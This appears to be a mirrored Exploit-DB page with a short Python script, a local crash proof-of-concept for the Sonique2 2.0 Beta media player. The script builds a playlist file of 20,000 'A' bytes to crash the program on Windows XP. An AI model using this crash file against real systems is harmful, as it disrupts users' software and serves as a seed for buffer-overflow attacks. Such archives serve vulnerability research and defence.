exploit-db-mirror/exploits/windows/dos/11234.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
324 B
Python
Executable file

#!/usr/bin/python
#
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC
# Found by: b0telh0
# Tested on: Windows XP SP3
crash = "\x41" * 20000
try:
file = open('b0t.pls','w');
file.write(crash);
file.close();
print "[+] Created b0t.pls file."
except:
print "[-] Error cant write file to system."